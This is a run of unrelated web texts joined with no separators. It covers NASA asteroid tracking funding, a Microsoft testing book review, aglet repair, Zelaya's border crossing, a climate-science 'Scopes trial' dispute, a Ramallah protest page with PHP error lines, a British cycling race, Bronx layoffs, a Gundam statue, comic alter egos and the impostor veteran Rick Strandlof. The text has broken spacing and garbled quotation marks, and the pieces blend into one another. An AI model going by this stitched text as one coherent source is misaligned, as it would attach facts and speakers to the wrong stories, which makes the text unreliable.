Congressordered NASA in 2005 to find and track 90 percent of the largeasteroids near Earth by 2020 , but did not set aside the necessary fundsrequired to do the job , according to a report released Wednesday by the National Academy of Sciences .
Withoutthat funding , NASA will not be able to build the new facilities and telescopes requiredto track potentially threatening asteroids down to the size of about 460 feet ( 140 meters ) across , according to the interim report .
? I thinkthey ?re pretty much right on , ? said Lindley Johnson , NASA ?s manager of the Near - Earth Objects program at the agency ?s headquarters in Washington .
Johnson toldSPACE.com
Wednesday that NASA has estimated it needs between $ 800 million and $ 1 billion over the course of 12 to 15 years to build and supportthe more sensitive telescopes required to meet its goal of tracking most of thenear - Earth objects .
AstronomerDonald Yeomans , manager of NASA 's Near - Earth Object program office at the JetPropulsion Laboratory in Pasadena , Calif. , has said that about 15 percent ofthe objects 460 feetwide and larger have been found , and only 5 percent of objects down to about 164 feet ( 50 meters ) in size .
One of thetop space rocks under observation is 2007 VK184 , a 425 - foot - wide ( 130 meters ) asteroid that has a 1 - in - 2,940 chance of hitting Earth sometimebetween 2048 and 2057 .
An impact , if it occurred , would cause an explosionroughly equivalent to 150 million tons of TNT , or more than 10,000 times thatof the atom bomb droppedon Hiroshima .
NASA isjust about 85 percent complete with tracking asteroids about a half - mile ( 1 km ) in size , Johnson said .
Huntingasteroids near Earth
Scientistsestimate there are about 100,000 asteroids and comets near Earth , but onlyabout 20,000 are expected to pose any risk of impact .
As of Monday , NASA hasfound 6,330 of those objects , 1,000 of them flying in orbits that could potentiallythreaten the Earth in the future , Johnson said .
Aside fromefforts to launch space - based missions to track incoming asteroids by Germanyand Canada , the United States is carrying the bulk of the asteroid watch work , the new report stated .
NASA currently has three separate search teams runningfive different telescopes to hunt for potentially threatening objects nearEarth .
The recent impacton Jupiter last month of a previously unknown object has brought Earth ?s riskof a similar hit back to the forefront .
If such an impact occurred on Earth , theresults wouldbe catastrophic , scientists have said .
? It caughtus a little bit by surprise , ?
Johnson said of the Jupiter impact , whichscientists believe was caused by an asteroid or comet .
Johnsonsaid that scientists plan to use data from NASA ?s new Wide - field Infrared Survey Explorerspacecraft , which is slated to launch in late 2009 to map the night sky in moredetail than ever before , to expand their search for near - Earth objects .
He andhis team are looking forward to the final version of the National Academy ofSciences report .
A finalversion of the report is slated to be completed by the end of the year .
In themeantime , NASA recently launched a new ?
Asteroid Watch ?
Web site ( http://www.jpl.nasa.gov/asteroidwatch/)to keep the public current on its work to track near - Earth objects .
The Website launched July 29 to post updates and alert the public to new research andfindings via updates , Twitter and an asteroid tracking widget .
Johnsonsaid the Web site was in development long before the Jupiterimpact , which occurred just over a week earlier .
? We hadactually started work to bring up that Web site a couple of months ago , ?
Johnsonsaid .
?
That was just another event out of the blue .?
Eduardo Medeiros
É ilustrador , mas já foi um modelo de renome internacional , chegando a ser exclusivo de algumas agências incluindo a ford models .
Cansado de se destacar pela sua ofensiva beleza , resolveu voltar a sua terra natal e se dedicar a sua verdadeira paixão : o balé contemporâneo e a dança de salão .
No meio de uma vida conturbada encontra tempo para sua HQ online " SOPA DE SALSICHA " principal motivo desse blog existir .
Course Home
Welcome to 0368-3469 : Multicore Programming
Textbook : " The Art of Multiprocessor Programming " by Maurice Herlihy and Nir Shavit , Morgan - Kaufmann Elsevier , March 2008 .
You can read the introductory material .
Students : read the administration page .
Author : Alan Page , Ken Johnston & Bj Rollison
Publisher : Microsoft Press , 2009
Pages : 405
ISBN : 978-0735624252
Aimed at : Developers and software architects , managers and general audience of software users
Rating : 4
Pros : Lots of amusing anecdotes , some clear theory
Cons : Lacks specific detail of testing techniques
Reviewed by : Mike James
A book on testing software at Microsoft !
It ’s a gift to anyone wanting to make a joke at the company 's expense .
Many a user would claim that , based on its products , there is no evidence that testing goes on at all and surely such a book would have very few pages .
Of course this is unfair , but fun .
Getting software right is n't easy and given the size of the Microsoft codebase you can expect one or two bugs to have slipped through .
So a book on how the software giant tackles the problem is a good idea and should be instructive .
The first thing to say is that this is not the book to read if you want to know anything much about the theory and practice of testing .
It does describe some of the basic ideas of testing , and it has some nice anecdotes that will raise a smile , but it really does n't describe anything that is n't better described in other books .
It is n't a course on how to test software , this much is clear , but what exactly the book is all about is more difficult to explain .
It starts off with some reminiscences of Microsoft , tales of company days out and bonding .
It describes how the idea of testing software seems to have occurred to Microsoft at what to the rest of us might seem like a very late point in the development of a software company .
It covers how Bill Gates hired people who went to the same school as he did to do jobs he really did n't seem to understand .
It explains how Microsoft realised that testing was a good idea and how they recruited people , created job structures and managed the whole thing .
This first section of the book is best described as a guide to the testing management structures within Microsoft .
The enthusiasm for the company expressed if probably appropriate for a Microsoft employee writing a Microsoft Press title but for the reader it very quickly becomes slightly embarrassing and gauche .
It reads very much like a final year school student writing up a report of the year 's activities certain that it will be read by the principal .
Overall the effect is to make you think that Microsoft started out as an amateur organisation and stumbled its way to some sort of serious professional structure by shear enthusiasm and energy .
A notion I personally can believe .
The second major section is about testing theory .
For the general reader interested in testing rather than in Microsoft this is worth the effort as it is a well written and clear , but it does n't go very far and you can find the same in almost any book on the subject .
If you know nothing at all about testing then it ’s a good introduction and might be useful if you have to introduce testing ideas to a non-programmer member of a team to get them more fully on - board .
The theory laid out in this section can be used in conjunction with a variety of software testing tools available on the market .
Later chapters describe how testing is performed but you never really know if the author is telling you that this is the way Microsoft does it .
To be clear , nowhere does the book detail how Microsoft tests any particular product and certainly not the flagship product - Windows .
Again there are lots of anecdotes and occasionally you can't help feeling that Microsoft as a company was , and perhaps still is , naïve about how to do things .
Even so you can't help be envious of their resources .
The story about buying $ 20,000 worth of multimedia from the local computer store to test to see how Windows 95 worked with them is a case in point - ironically the point of sale computers could n't cope with the number of items or the bottom line and kept on crashing .
The testing was then actually carried out by asking employees to " adopt a multimedia title " - i.e. take a free program home , to keep , in reward for running it and testing it .
Pragmatic - yes .
The way to go in structured software testing ?
Probably not .
I actually enjoyed this part of the book as it is an easy - to - read mixture of practical testing theory and tiny snipes of juicy information about how the " big boys " behave behind the scenes .
For example , how did they stress test Office in the early days ?
The answer is a stapler laid across the keyboard to product a stream of character input .
Well it worked !
There 's a lot of discussion of minor testing technique in fairly minor Microsoft products and you might well find all of this interesting but it does n't answer any of the really big questions .
The final verdict has to be that this is a book that you could well enjoy reading but not for the promise of new knowledge but simply to get a tiny view inside the software giant that is Microsoft and to discover that it is sometimes just as clueless as the rest of us .
Thoughtful Machine Learning with Python
Author : Matthew Kirk
Publisher : O'Reilly
Pages : 250
ISBN : 978-1491924136
Print : 1491924136
Kindle : B01N12DLF9
Audience : Non maths oriented programmers wanting to get into machine learning .
Rating : 2
Reviewer : Mike James
A book on AI in Python , what could be better ?
+ Full Review Python Basics
Author : H. Bhasin
Publisher : Mercury Learning
Pages : 450
ISBN : 978-1683923534
Print : 1683923537
Kindle : B07L5SK5CZ
Audience : People wanting to learn Python
Rating : 2.5
Reviewer : Mike James A " Self - Teaching Introduction " to Python Basics .
Is this a good place to start ?
+ Full Review Introduction to Programming in Python
C Primer Plus , 6e
Haskell From The Very Beginning
Data Structures And Program Design Using C
The Official BBC micro:bit User Guide
Jupyter Cookbook
Java By Comparison
Mission Python
Joey and I are on tour .
Tour dates and times are all here on the Overqualified Tour Page .
If you are like me and need the internet to remind you that you 've got plans , you can attend ( and invite your friends ! ) to the facebook events :
We are leaving for Philly , now !
UP is so sad and awesome .
I hope to see Drag Me To Hell in the next few days .
Sam Raimi doing horror again !
Come see us in Philly tomorrow night !
We 're gonna post soon about DC , too .
It is hard to plan things when you are having fun .
Aglet Repair
Aglets are a small but crucial part of shoelaces .
Missing or damaged aglets can be a real nuisance .
Here 's several different tutorials for creating new aglets following loss , damage or after shortening shoelaces .
Why Repair Aglets ?
The first question is – why go to any trouble repairing aglets ?
Why not simply replace the shoelaces ?
Personally , I replace my aglets because I cut down all of my shoelaces to a comfortable length , but there 's plenty of other possible reasons :
You 're “ out bush ” or have difficulty getting to a store .
You can't get matching laces for your shoes in the correct length .
You prefer the eco-friendly option of repairing rather than replacing .
You 'd like to make your aglets stronger before they become damaged .
they become damaged .
You 'd like to brighten up your shoelaces with a bit of color or sparkle .
You 're after aglets to finish off some custom shoelaces that you 've made out of ribbons , string or some other material .
If any of these sounds like a good reason , and you 're game to undertake a little fiddly work , this section contains several methods for creating aglets .
8 Different Ways To Create Aglets
Adhesive Tape Aglet
The simplest way to create an aglet is to wrap adhesive tape two or three times around the end of the shoelace .
Combine with glue for added security .
FEATURES Cheap Readily available
Not very durable
Candle Wax / Resin Aglet Dripping wax or resin onto the lace end , then rolling it between your fingers while still warm , creates a reasonable short - term aglet .
FEATURES Cheap Readily available
Not very durable
Glue / Nail Polish Aglet Soaking the shoelace end either with general purpose glue or with several coats of nail polish produces a more durable aglet .
FEATURES Cheap More durable Messy to create
Thread and Glue Aglet Binding the lace end with thread and glue produces a very strong aglet .
It 's a small version of “ whipping ” , which is used on larger ropes .
FEATURES
Neat looking Very durable Tricky to create
Heat Shrink Tubing Aglet Normally used to insulate electrical joins , heat shrink tubing makes a neat , though slightly flexible , aglet .
It 's my favorite method when shortening laces .
FEATURES
Very easy Choice of colors Rather flexible
Metal Tubing Aglet Small gauge metal tubing , which can be found at hobby suppliers , makes an extremely durable aglet – perfect for punishing activities like football or skateboarding .
FEATURES
Most durable Choice of colors Expensive
Melted Shoelace Aglet Some shoelaces are made from synthetic materials that can easily be melted over a match , lighter or candle to form a reasonable aglet .
FEATURES Cheap Fairly easy Synthetic laces only
Knotted Shoelace Aglet Failing all other methods of aglet repair , the shoelace end can simply be knotted tightly to at least stop it unravelling .
This does n't aid lacing , and in fact prevents re-lacing .
FEATURES
Cheap & easy Does n't aid lacing Prevents re-lacing
LAS MANOS , Honduras 
The ousted president of Honduras , Manuel Zelaya , briefly stepped a few feet inside Honduran territory for the first time in nearly a month on Friday afternoon , and he demanded that he be allowed to return to power .
Driving a white Jeep Wrangler north from Nicaragua , Mr. Zelaya arrived at this remote border post , where he was met by throngs of supporters and a couple of dozen soldiers and police officers , who threatened to arrest him if he tried to enter the country .
Mr. Zelaya approached the commanding officer , who stood on the Honduran side of a chain link fence , shook the officer ’s hand and then crossed into Honduras .
The crowds cheered , and the officers backed away .
Mr. Zelaya labeled the move a triumphant return .
The police , however , said he had not officially entered Honduran territory .
Looks like it 's time to bring back Clarence Darrow and William Jennings Bryan :
The US Chamber of Commerce wants to subject the science of climate change to a " Scopes monkey trial . "
The Los Angeles Times reported Tuesday that the world 's largest business lobby is pushing the Environmental Protection Agency to hold a public hearing to defend its endangerment finding , which determined that greenhouse gases are pollutants that pose a threat to public health and welfare and can therefore be regulated by the EPA under the Clean Air Act .
The Times describes what the Chamber has in mind :
Chamber officials say it would be " the Scopes monkey trial of the 21st century " -- complete with witnesses , cross-examinations and a judge who would rule , essentially , on whether humans are warming the planet to dangerous effect .
" It would be evolution versus creationism , " said William Kovacs , the chamber 's senior vice president for environment , technology and regulatory affairs .
" It would be the science of climate change on trial . "
In a press release , the advocacy group Republicans for Environmental Protection bristled at the Chamber 's apparent swipe at creationists , and what the group called " a cynical attempt to pit science against religion . "
" The Scopes trial is a false comparison .
Regardless of what one believes about the earth 's origins , the facts about the global carbon cycle do not change .
Excess carbon is stored away in coal and oil deposits .
By burning large quantities of coal and oil , we release that excess carbon back into the atmosphere , upsetting the natural balance , " said David Jenkins , the group 's vice president for government and political affairs .
" The chamber 's efforts are both imprudent and impious . "
Earlier this year , Mr. Jenkins penned an article titled " God ’s Climate Plan " [ PDF ] , which argues that Christians should be concerned about climate change .
If the Chamber is indeed taking a shot at creationism , they 're probably alienating many core supporters .
According to a 2008 Gallup poll , some 60 percent of Republicans believe that humans were created " as is " within the last 10,000 years , compared with 38 percent of Democrats .
This belief is soundly refuted by the overwhelming empirical evidence that shows that humans evolved over millions of years .
But if you flip the Chamber 's analogy – comparing pundits who reject the science of climate change to those who reject the science of evolution – the comparison becomes decidedly apt .
Both groups willfully ignore mountains of firmly established scientific evidence .
Both groups falsely portray the scientific community as divided over settled science .
Both groups make spurious appeals to academic freedom , arguing that " both sides " of the debate should be presented as though they possess equal merit .
And both groups derive most of their funding from privately funded think tanks , having scant presence in the science departments of accredited colleges and universities .
The motivations of those who deny climate change and who deny evolution are probably very different .
But in some cases , it 's the very same people who deny both phenomena .
Here are just a few examples :
Steven Milloy , a prominent climate change denier and " junk science " contributor to Fox News , told the Cato Institute in 2007 that " [ e ] xplanations of human evolution are not likely to move beyond the stage of hypothesis or conjecture . "
Roy Spencer , a researcher at the University of Alabama in Huntsville , author of the 2008 book " Climate Confusion : How Global Warming Hysteria Leads to Bad Science , Pandering Politicians and Misguided Policies that Hurt the Poor , " and the " official climatologist " of Rush Limbaugh 's EIB network , wrote in 2005 that " intelligent design , as a theory of origins , is no more religious , and no less scientific , than evolutionism . "
Actor and commentator Ben Stein , whose 2008 film Expelled : No Intelligence Allowed claimed that belief in evolution led directly to the Nazi Holocaust , asserted on Fox News this year that " global warming is by no means proved . "
And Arthur Robinson , the senior author of the Oregon Petition , that list of some 31,000 self - described scientists who deny the existence of convincing evidence of global warming , is also a signatory to the " Scientific Dissent from Darwinism " circulated by the Discovery Institute , the primary think tank promoting Intelligent Design theory .
The 1925 trial of John Scopes seems to have done little to change the minds of American creationists ( it took another four decades for Tennessee 's anti-evolution law to be repealed , and the debate over teaching evolutionary biology in public schools is still very much alive ) .
Similarly , it 's unlikely that a modern - day trial of climate science would be anything more than a tendentious circus .
But climate change , unlike evolution , is happening on a time scale that humans can directly observe .
If the Chamber of Commerce has its way and action to mitigate greenhouse gas emissions is delayed , we can expect that the effects of these emissions will be widely felt and acknowledged by those who will inherit the climate .
--
Follow Eoin on Twitter
500 balloons launched from Ramallah in honor of child prisoners Ma'an News July 28 , 2009
Ramallah � Ma�an �
Balloons representing the nearly 350 minors being kept in Israeli prisons were released during a demonstration in Ramallah on Tuesday
Each carried the name of a current or former child prisoner detained by Israeli forces .
The 500 green , red , black and white balloons were released from the Al - Manara circle in the center of Ramallah in a protest organized by the families of prisoners .
Mothers , fathers , brothers and sisters of the detained minors held pictures of their loved ones .
One mother , Um Muhammad , said she had not seen her son for more than two years because Israeli security refused her permission to travel and visit the detention facility .
Another mother , Umm Ibrahim , said she had been able to visit her son , but found the experience horrifying , " We are insulted and humiliated by Israeli soldiers and inspectors during visits to prison , and sometimes they deny us access arbitrarily , " she said .
:: Article nr. 56442 sent on 29 - jul-2009 11:36 ECT
www.uruknet.info?p=56442
::
The views expressed in this article are the sole responsibility of the author and do not necessarily reflect those of this website .
The section for the comments of our readers has been closed , because of many out - of - topics .
Now you can post your own comments into our Facebook page : www.facebook.com/uruknet
Warning : include (./ share/share2.php ) : failed to open stream :
No such file or directory in /home / content/25/8427425/html/vhosts/uruknet/colonna-centrale-pagina-ansi.php on line 385
Warning : include ( ) : Failed opening './share/share2.php ' for inclusion ( include_path='.:/usr/local/php5_6/lib/php') in /home / content/25/8427425/html/vhosts/uruknet/colonna-centrale-pagina-ansi.php on line 385
[ Printable version ] | [
Send it to a friend ]
[ Contatto / Contact ] | [ Home Page ] | [ Tutte le notizie / All news ]
The British national road race championship has often proved a pitfall for Europe - based professionals and Mark Cavendish , Bradley Wiggins , David Millar and company were upstaged by Kristian House of the British - based Rapha - Condor squad .
They are a full - time outfit sponsored by a cycle clothing company and London 's leading bike shop but even so their entire annual budget would not approach the six - figure salary of the four - times Tour de France stage winner Cavendish .
After Cavendish crossed the line to take sixth , he asked onlookers who had won and was told it was House , whose biggest previous win was the FBD Ras Tour of ­Ireland .
" What ? " shouted Cavendish , swerving and almost falling off his bike in surprise .
Later he said hefelt House had not done his share of work in the race .
" It 's never nice when the winner is sat on for the whole day .
He said , ' I 'm tired , I 'm tired ' but he was able to go with everything . "
Cavendish has rightly earned a reputation for wearing his heart on his sleeve but his words were ill - considered given that he had not witnessed the final miles .
House had been part of a lead quartet which sprinted away from the rest of an elite 10 - rider lead group with five laps remaining of a four - and - a - half - mile finishing circuit around the town , and he did not seem to be stinting in his efforts .
" I was definitely not sitting on thewhole day , " responded House .
" I was cagey with my efforts and rode when I needed to .
The race was going to happen on the finish circuits and I was n't prepared to nail myself 100 km from the end . "
Indeed , the 30 - year - old from Bournemouth , who spent much of his childhood in Texas , was half - expecting that one of his two nominated team leaders at Rapha - Condor would come up from behind .
" I did n't even think about winning until five or six laps to go at the end . "
Cavendish 's confusion was understandable , as the race was frenetic , with no clear pattern until the final miles .
The action had been expected to happen on the Tumble , a two - and - a - half - mile ascent over exposed moorland past the disused pit heaps near Blaenavon at just over half - distance .
Instead , with Wiggins and the Kenyan - born Chris Froome to the fore , the race had split well before then .
Small groups formed and reformed at the front before an elite group of a dozen emerged behind Wiggins – whose aggression must bode well for the Tour de France – and Froome , who will not ride the Tour because his Barloworld squad has not been selected .
Froome was one of the four who sprinted for gold along with House , the young Manxman Peter Kennaugh who rides for the national Under - 23 academy , and Daniel Lloyd of the Cervelo team , the silver medallist here behind David Millar in 2007 .
Kennaugh was a stage winnerlast week in the Under - 27 Giro d'Italia , where he finished third overall , and was the favourite for the finish sprint but managed only the bronze behind House and Lloyd .
A hard - fought men's race was a suitable conclusion to a weekend which had included Nicole Cooke 's 10th nationalsenior road championship win on Saturday , on home soil .
The Olympic andworld road race champion out - sprintedthe one rider who might threaten herfor leadership of Great Britain in 2012 , the 20 - year - old track world champion LizzieArmitstead .
More significantly , the great Beryl Burton 's record of 12 national women 's road championship wins is now well within Cooke 's reach .
Eyebrows had been raised on Saturday when Armitstead was not initially awarded the silver medal , on the grounds that she had won the Under - 23 championship , held within the elite title race .
That ruling was overturned on Saturday evening , with Armitstead given the senior silver , and today , when Kennaugh found himself in a similar position – best under - 23 but elite bronze medallist – he was allowed to keep his elite medal .
At a work force center in the Bronx on Friday , Ahmadi Scruggs , 32 , said he was dismissed in April from his job in customer service at a New York bank that cut its payroll after many of the mortgages it made went sour .
Mr. Scruggs , who is black and lives in Soundview , in the Bronx , said he did not think that the layoff , which followed a hiring freeze , was racially motivated , but said that it appeared to have a disparate effect on whites and minority workers .
“ My department was mostly black and Hispanic , ” Mr. Scruggs said .
“ Management was mostly white and they did n’t get let go .
You would think they would trim the fat from the top , not the bottom , because it ’s the lower - wage workers that do the bulk of the work . ”
Mr. Scruggs , who is married and has three children , said his three - month severance package had run out .
Mr. Scruggs said he was trying to have his unemployment benefits extended so that he could begin studying to become a surgical technician .
“ I might as well invest in myself for the next year and then get back in the work force , ” he said .
Last month , Roger Richardson , who lives in the Mott Haven section of the Bronx , left his sales job at a Home Depot store after his hours were cut by more than half .
“ I had to find something else because my bills surpassed my salary , ” said Mr. Richardson , who is black .
The recession has also worsened the unemployment rate in New York among other ethnic groups , although none as sharply as blacks .
Among Hispanics , the rate rose to 9.3 percent in the first quarter of 2009 from 6.4 percent in the first quarter of 2008 ; among Asians and other ethnic classifications , the rate rose to 7.1 percent from 5.5 percent .
David R. Jones , president and chief executive of the Community Service Society , which lobbies on behalf of low - income workers , said he did not “ think this recession has gone out equally . ”
“ Low - wage workers and workers who lack skills are really getting hit hard , ” he said .
“ These are the workers who are sort of fungible .
They lose their jobs very quickly , particularly in retail , the people who move boxes and do unskilled work .
There are large numbers of African - Americans in that sector . ”
Piece by piece , an 18 - meter tall , 35 - ton full - scale Gundam statue is being assembled in Odaiba , Tokyo to commemorate 30 years of Mobile Suit Gundam .
When finished in mid-July , the enormous figure will entertain onlookers by moving its head and shooting light and mist from 50 points on its body .
Until then , we have these photos of its magnificent legs and assorted parts .
More photos at Mainichi .
( Thanks , Jerome ! )
Would you believe that Bob Einstein is a comedy genius ?
Just ask his younger brother : Albert Brooks .
Einstein was a writer for The Smothers Brothers on TV in the 1960s , but he first appeared as an inept parody of daredevil stuntmen in the early 1970s , when Evel Knievel had the nation 's rapt attention .
While Knievel retired , Super Dave Osborne just kept going and going , from Showtime 's Bizzare in the 1980s to his own variety show and animated series .
He still shows up as Super Dave on Jimmy Kimmel 's show and Spike TV agreed to air a four - part Super Dave special this summer .
Dan Whitney grew up in Nebraska and Florida , and went about pursuing his stand - up career in the 1980s .
It was going well enough , one would suppose .
Here 's a clip of Dan Whitney performing on TV at a " Comedy From the Caribbean " show .
S'ok , but let 's just say it was not getting it done .
Then Whitney 's radio career took a twist , and during a period in which he was calling in to radio programs with various characters , he hit upon Larry the Cable Guy , a redneck with family values and a catchphrase .
" Git - R - Done ! " would not only make him a comedy club headliner , but catapult him to stardom , and after going on the Blue Collar Comedy Tour , he began becoming as big , if not bigger , than his cohorts .
A 60 Minutes profile in 2006 revealed how many millions of dollars " Larry " was raking in , despite a couple of " Larry " movies that did n't go anywhere .
It 's rare to see or hear him out of character .
And when you can turn that catchphrase into a foundation that can make a $ 1 million donation , as he did earlier this month , well , we do n't blame him for continuing to put on a fake accent and sleeveless flannel .
He played to a stadium crowd at the University of Nebraska this July 4 , and will release the " Tailgate Party " performance as a CD in September .
Comedians have created and pulled off countless characters over the years ( just think of your favorite sketch groups or shows , such as Saturday Night Live , Monty Python or Kids in the Hall , for plenty of examples ) .
But every once in a while , a comedian creates a character so memorable that the alter - ego takes on a life of his / her own , so much so that the comedian 's ego is fed by the alter - ego .
Here are 9 more comedy acts , who , for better or worse , are known for being someone else .
When I heard that Pee - Wee Herman would be returning to the stage this November in Los Angeles , part of me was excited and intrigued to see how Pee - Wee 's childish naivete would play now that actor Paul Reubens is 57 .
You can watch any of these 10 videos of Pee - Wee Herman in action to relive some of his great moments since Reubens first developed the character as a member of The Groundlings in the late 1970s .
There 's a part of me , though , and perhaps a part of you that has wondered about Reubens over the years since he ran afoul of the law in 1991 .
That incident put a kibosh on Pee - Wee , but what about the comedian / actor who was Reubens ?
Although he has had some delightfully quirky character parts recently on shows such as 30 Rock and Pushing Daisies , Reubens never really has gotten us to forget about Pee - Wee .
Is it typecasting when you cast the type yourself ?
It really could n't surprise anyone , then , to see Reubens going back to the well once more .
Mr. Bean ( Rowan Atkinson )
Rowan Atkinson 's alter - ego has been mumbling and grousing about for decades now .
Atkinson debuted his Mr. Bean character during Montreal 's Just For Laughs festival in 1987 by testing him out on French - speaking audiences .
His British TV show ran from 1990 - 1995 , but Mr. Bean continued to live on as a global star in two films , Bean ( 1997 ) and Mr. Bean 's Holiday ( 2007 ) .
Atkinson has had other roles in British TV and film , but nothing has quite matched Bean .
Here 's a great clip of Atkinson explaining Bean in a 2007 BBC interview , followed by a classic clip of Atkinson as Bean :
Dame Edna ( Barry Humphries )
Australian comedian Barry Humphries has created a couple of characters .
I 'm sure if you 're Australian or British , you may even be able to name them .
But none of them keep showing up on American television , unless you count Dame Edna .
Humphries first showed up onstage in Melbourne as " Mrs. Norm Everage " back in the 1950s !
She developed a stage show in London in the 1970s , and made repeated TV appearances throughout the 1980s .
In a Tootsie - like twist , Barry Humphries began getting more and more work as Dame Edna , with roles in TV ( Ally McBeal ) and movies ( Nicholas Nickleby ) .
She had a talk show in Britain in 2007 , and over the past few years , showed up frequently as a guest on The Tonight Show with Jay Leno .
Here 's Dame Edna on the BBC last year :
Ernest , aka Ernest P. Worrell ( Jim Varney )
Imagine you 're actor Jim Varney .
You 're in your early 20s and looking for a big break when you audition for a local TV commercial in Kentucky .
Would you ever have figured that that ad , in which you play a rubber - faced guy named Ernest , would turn into a full - time career ?
As Ernest ?
It 'd be like getting a job as a professional sports mascot , except instead of being inside the costume , you are the costume .
" KnoWhutIMean " became a catchphrase , and Varney ended up starring in several Ernest films : Ernest Goes To Camp ; Ernest Saves Christmas ; Ernest Goes to Jail ; Ernest Scared Stupid ; Ernest Rides Again ; Ernest Goes to School ; Slam Dunk Ernest ; Ernest Goes to Africa ; Ernest in the Army .
Varney died in 2000 .
This video may tell you everything you need to know about Ernest :
Andrew " Dice " Clay ( Andrew Clay Silverstein )
Has there been a comedian who has embraced and tried to distance himself as much from his persona as Andrew Clay ?
He created the vulgar " Diceman " character in his 20s , and after appearing in character in Making the Grade and Pretty in Pink , Andrew Dice Clay really took off as a stand - up comedian in the late 1980s thanks to his naughty nursery rhymes .
There was the Rodney Dangerfield special in 1987 , and then , a rapid rise that had him selling millions of records , playing Madison Square Garden , hosting SNL and starring in his own major motion picture .
But the rapid rise begat an equally tragic fall , getting banned from MTV and bombing all over the place .
It got bad enough in the mid-1990s that he tried to front a CBS sitcom as Andrew Clay and play completely against the Diceman type , but fans and foes alike did n't buy it , and it was done in its first season .
So Clay picked up his " Dice " again , making a comeback via basic cable reality , and is still on the road with fans who still love the old filthy jokes .
He did n't fare so well as " Dice " this year on Donald Trump 's Celebrity Apprentice , however , even though he boasted he was the greatest stand - up in history .
Oh , brother .
Here 's the clip from the 1987 Dangerfield special that really introduced him to the world :
Minnie Pearl ( Sarah Colley )
I bet you thought Minnie Pearl was her real name , now , did n't ya ?
How - DEE !!!
Minnie Pearl was like the hillbilly version of Mae West .
Sarah Colley developed the character of " Cousin Minnie Pearl " and shortly thereafter , got her a spot performing with the Grand Ole Opry in 1940 .
She remained part of the Opry until her death in 1996 .
You also saw Minnie Pearl , with the fruity hat with the dangling pricetag , spinning her down - home and flirty humor on Hee Haw and several other variety and talk shows throughout the 1970s and 80s .
Here 's a clip from an old country music awards show in which Minnie Pearl jokes with Dolly Parton before presenting an award :
The Three Stooges
Ah , The Three Stooges .
Moe Howard ( Moses Horwitz ) , Larry Fine , Curly Howard ( Jerome Horwitz ) , Shemp Howard ( Samuel Horwitz ) , Joe Besser , and Curly Joe DeRita ( Joseph Wardell ) made slapstick movies from the 1930s into the 1960s , which in itself , is quite a physical feat for guys who kept beating each other up again and again and again .
So indelible a mark on the culture that I do n't recall ever hearing about any of the guys doing anything that was n't Stooge - like .
The Farrelly Brothers are trying to re-create them in a new movie .
Good luck with that .
Here 's Moe , Larry and Curly in a " minisode " version of Beer Barrel Polecats :
The Marx Brothers
Before the Stooges , there were the Marx Brothers : Chico , Harpo , Groucho , Gummo and Zeppo .
Their real names were Leonard , Adolph , Julius , Milton and Herbert , but we 're happy about the changes .
And as they moved from vaudeville to Broadway to the big screen , their singing and musical abilities were only topped by their senses of humor .
Wicked senses of humor .
Each one came up with their own stage character and persona , and by the time movies became talking pictures , the Marx Brothers were ready for their close - ups .
Their films of the early 1930s are bonafide classics , Duck Soup and A Night at the Opera among several .
Groucho continued his career in character on radio and then TV , hosting the quiz show You Bet Your Life throughout the 1950s .
His character is so famous that it 's been sold in costume shops and toy stores for decades , simply with glasses , eyebrows , and mustache .
You add the fake cigar .
Here 's a fan - made montage of some funny Marx Brothers scenes .
Lots of one - liners , puns and sight gags .
Hooray !
Honorable mentions ?
Borat , Bruno and Ali G. ( Sacha Baron Cohen ) , Stephen Colbert on " The Colbert Report " ( Stephen Colbert ) , Triumph the Insult Dog ( Robert Smigel ) , Latka and Tony Clifton ( Andy Kaufman ) , Carlos Mencia ( Ned Holness ) , Otis Lee Crenshaw ( Rich Hall ) , Neil Hamburger ( Gregg Turkington ) , Raaaaaaaandy !
( Aziz Ansari ) , Father Guido Sarducci ( Don Novello ) , Madea ( Tyler Perry ) , Dolemite ( Rudy Ray Moore )
Retired Marine Capt .
Rick Duncan carried a list of phone numbers of those in the business of helping veterans .
One was for the VA clinic in Colorado Springs , and in 2008 he pressed it upon Mike Flaherty , a young Army veteran struggling with depression .
He understood , Duncan told Flaherty .
He ’d been to Iraq three times .
Attacked in Fallouja , he ’d returned home with a metal plate in his head and a diagnosis of post - traumatic stress disorder .
Flaherty made the call and saw a counselor ; in time his depression lessened .
He had his friend Rick Duncan to thank .
He would not learn the truth about Duncan for a year , and when he and other veterans did , it rolled over them with the weight of a tank : Rick Duncan had never served in Iraq , had never been wounded , had never been a Marine at all .
He was n’t even Rick Duncan .
Advertisement
He was Rick Strandlof , and he was a fraud -- a young man with a prison record , a penchant for embellishment and a history of mental illness .
Diagnosed with bipolar disorder , he would describe himself after his unveiling as a schizophrenic , saying , “ I sometimes believe things other people know not to be true . ”
In a little more than a year , Strandlof convinced many other people to believe things that were not true too , establishing a high profile here as an advocate for veterans and a passionate activist against the war in Iraq .
Even after learning the truth , Flaherty recalled the sincerity in his friend ’s eyes .
The man he knew as Rick Duncan seemed to genuinely care , and Flaherty was better for it .
What was he to think now ?
The first of many lies that Richard Glen Strandlof , 32 , told was that he was from California .
He made that admission recently from the El Paso County Jail , where he was being held on a traffic warrant as the FBI investigated whether he had committed fraud in posing as a Marine .
Advertisement
Actually , Strandlof said , he was from Montana .
He spoke over a video link , his dark brown hair still cut in the buzz that was part of his military persona .
As a child , Strandlof said , he had the same fascination with the military that many boys do , playing with toy Army men .
Even then , he made up stories about his adventures .
“ He was very dramatic , making up stories , ” said Marcia Strandlof of Hot Springs , Mont. , who once was married to Strandlof ’s grandfather .
“ It was an ongoing thing with Rick ever since he was little . ”
One story he told at 14 was true :
He was gay .
That , Strandlof said , left him estranged from his parents : “ I ’ve never forgiven them for that . ”
Advertisement
Eventually , he ran afoul of the law , convicted of forgery and passing bad checks in Montana .
After prison , he moved to California and then Reno , and began to actively protest the war in Iraq .
While in Reno , Strandlof volunteered for two political action groups and was provided a rented Ford Explorer so he could help voters to the polls .
But after the 2004 election , the SUV was n’t returned to the rental agency , and police spotted it months later near his apartment .
Strandlof pleaded guilty in July 2005 to car theft and was sentenced to probation .
A judge ordered him to participate in a program for defendants with severe mental illnesses .
She also ordered him to take his medications and read a book on bipolar disorder .
According to Reno officials , he later presented himself to them as a promoter intent on bringing a grand prix race to the city .
Strandlof hinted at wealth , telling them that he lived in Incline Village , a high - income community near Lake Tahoe .
In fact , he was living in a Reno apartment complex with his boyfriend .
Advertisement
The plan went nowhere , though he boasted to local media that he had brought in $ 25,000 at a fundraising event -- a claim the FBI is also investigating .
By mid-2006 , Strandlof the race promoter vanished , disconnecting his phone and taking down his website .
